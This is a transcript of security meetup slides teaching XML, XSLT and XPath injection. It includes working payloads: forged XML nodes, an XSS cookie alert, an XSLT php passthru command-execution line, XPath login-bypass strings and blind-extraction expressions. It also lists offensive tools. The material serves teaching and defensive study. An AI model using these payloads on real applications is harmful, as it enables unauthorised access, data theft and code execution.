xml & xpath injections
DESCRIPTION
This presentation was presented at null/G4h monthly meet Bangalore - August 2014TRANSCRIPT
XML & XPath Injection
By AMol NAik (@amolnaik4)
Agenda
XML Basic XML Injection XXE Attack XSLT Attacks XPath Basics XPath Injections XPath Tools
All codes are at:
https://bitbucket.org/null0x00/null-humla-xml-injection/
3
4
XML Basics
eXtensible Markup Language Flexible text-based format Presents structured info Used for Data Exchange/Storage
XML Components
Root Element
Node
Node Value
AttributeEntity
CDATA Section
XML – CDATA Section
Tells parser not to use markup for characters in this section
Examples:
<![CDATA[if (c<10)]]>
<![CDATA[<script>alert(1)</script>]>
XML Injections
In Node Attribute
In Node Value
In CDATA Section
XML Injection – Node Attribute
Payload:
102”><author>demo</author><title>Demo
Demo</title><price>FREE</price></book><book id=“
<catalog>
<book id=“101”>
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price>INR 200</price>
</book>
</catalog>
XML Injection – Node Attribute
<catalog>
<book id=“102”>
<author>demo</author>
<title>Demo Demo</title>
<price>FREE</price>
</book>
<book id=“101”>
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price>INR 200</price>
</book>
</catalog>
XML Injection – Node Value
Payload:
Anonymous</author><title>Demo Demo</title><price>FREE</price>
</book><book id=“102”><author>
<catalog>
<book id=“101”>
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price>INR 200</price>
</book>
</catalog>
XML Injection – Node Value
<catalog>
<book id=“101”>
<author>Anonymous</author>
<title>Demo Demo</title>
<price>FREE</price>
</book>
<book id=“102”>
<author>demo</author>
<title>We Are Anonymous</title>
<price>INR 200</price>
</book>
</catalog>
XML Injection – CDATA
Payload:
INR 200]]></price></book><book id=“102”><author>demo</author>
<title>Demo Demo</title><price><![CDATA[
<catalog>
<book id=“101”>
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price><![CDATA[INR 200]]></price>
</book>
</catalog>
XML Injection – CDATA
<catalog>
<book id=“101”>
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price><![CDATA[INR 200]]></price>
</book>
<book id=“102”>
<author>demo</author>
<title>Demo Demo</title>
<price><![CDATA[FREE]]></price>
</book>
</catalog>
XML Entity
Variable Define
Shortcuts
Standard Text
Special Characters
Can be Internal/External
XML Entity
XXE Attack
XSLT
Extensible Stylesheet Language Transformations
Used for the transformation of XML documents
See this as CSS of XML
XSLT
XSLT Injection
XSS
<script>alert(document.cookie)</script>
Code Execution<xsl:value-of select="php:function('passthru','ls -la /')"/>
XPath Basics
Language to select XML Nodes
Formats XML data as tree-structured values
Similar as SQL (in some sense)
XPath Syntax
Uses path expressions to select nodes or node-sets in an xml document
Expression Description
nodename Selects all child nodes of the named node
/ Selects from root node
// Selects nodes from the current node that match the selection no matter where they are
. Selects current node
.. Selects parent of the current node
XPath Predicates
Used to find a specific node or a node that contain specific value.
Always embedded in square brackets.
Expression Result
/Employees/Employee[1] Selects first ‘Employee’ element that is the child of ‘Employees’ element
/Employees/Employee[last()] Selects last ‘Employee’ element that is the child of ‘Employees’ element
/Employees/Employee[position()<3] Selects first 2 ‘Employee’ elements that are children of Employees element
//Employee[@ID=‘1’] Selects all the ‘Employee’ elements that have an attribute named ‘ID’ with a value of ‘1’
XPath Location Path
Syntax: axisname::nodetest[predicate]
an axis - defines the tree-relationship between the selected node & the current node
nodetest – identifies node within an axis
Zero or more predicates – further refines the selected node-set
XPath Location Path
Example Result
child::Employee Selects all ‘Employee’ node that are children of the current node
attribute::id Selects the id attribute of the current node
child::* Selects all children of the current node
attribute::* Selects all attributes of the current node
child::text() Selects all text child nodes of the current node
child::node() Selects all child nodes of the current node
descendant::Employees Selects all ‘Employees’ descendants of the current node
XPath Functions
Function Name Description
substring(str,start,len) Return the substring from the start position to the specified length
string-length(str) Returns length of the string
count(item,item,…) Returns count of the nodes
starts-with(str1,str2) Return ‘True’ if str1 starts with str2, else ‘False’
contain(str1,str2) Return ‘True’ if str1 contains str2, else ‘False’
number(arg) Returns numeric value of agrument. Agrument could be boolean, string or node-set
string(arg) Returns string value of agrument. Agrument could be boolean, string or node-set
XPath Injection
XPath Query:
/Employees/Employee[UserName/text() = ‘user’ and Password/text() = ‘passwd’]/Type/text()
XPath Injection
No UserName & Password known:
user =’ or ‘1’=‘1passwd = ’ or ‘1’=‘1
/Employees/Employee[UserName/text() = ‘’ or ‘1’=‘1’ and Password/text() = ‘’ or ‘1’=‘1’]Type/text()
XPath Injection
UserName known:
user =mbrown’ or ‘1’=‘1passwd = anything
/Employees/Employee[UserName/text() = ‘mbrown’ or ‘1’=‘1’ and Password/text() = ‘anything’]Type/text()
XPath Injection
No UserName & Password known & Password is not vulnerable:
user =’ or ‘1’=‘1’ or ‘1’=‘1passwd = anything
/Employees/Employee[UserName/text() = ‘’ or ‘1’=‘1’ or ‘1’=‘1’ and Password/text() = ‘anything’]Type/text()
Blind XPath Injection
XPath Query:/Employees/Employee[@ID=‘_id_’]
/Employees/Employee[@ID=‘1’ and ‘1’=‘1’] =>TRUE
/Employees/Employee[@ID=‘1’ and ‘1’=‘2’]=>FALSE
Blind XPath Injection
Extracting XML file structure
Get count of all nodes▪ count(/*/child::*)
Get name of first node▪ name(/*/child::*[1])
Get count of child nodes of first node▪ count(/*/child::*[1]/child::*)
Blind XPath Injection
Extracting XML file structure
Get name of first child node of first node▪ name(/*/child::*[1]/child::*[1])
Get value of first child node of first node▪ /*/child::*[1]/child::*[1]/text()
Repeat the process for all child nodes
Blind XPath Injection
Extracting XML file structure
Check if the first character of value of first child node of first node is ‘J’
/Employees/Employee[@ID=‘123’ or substring((/*/child::*[1]/child::*[1]/text()),1,1)=‘J’]
XPath Injection Tools
XPath Blind Explorer
Xcat
xmlchor - IronWASP Plugin
recon-ng
xpath_bruter
References
XPath Injectionhttp://www.slideshare.net/robertosl81/xpath-
injection-3547860 Hacking XPath 2.0http://www.slideshare.net/michelemanzotti/hacki
ng-xpath-20 Blind XPath Injectionhttp://2stop.me/S%C3%A9curit%C3%A9%20Infor
matique/Web/EN%20-%20Blind%20Xpath%20injection.pdf
Thank You !!
AMol NAikhttp://twitter.com/amolnaik4
http://amolnaik4.blogspot.com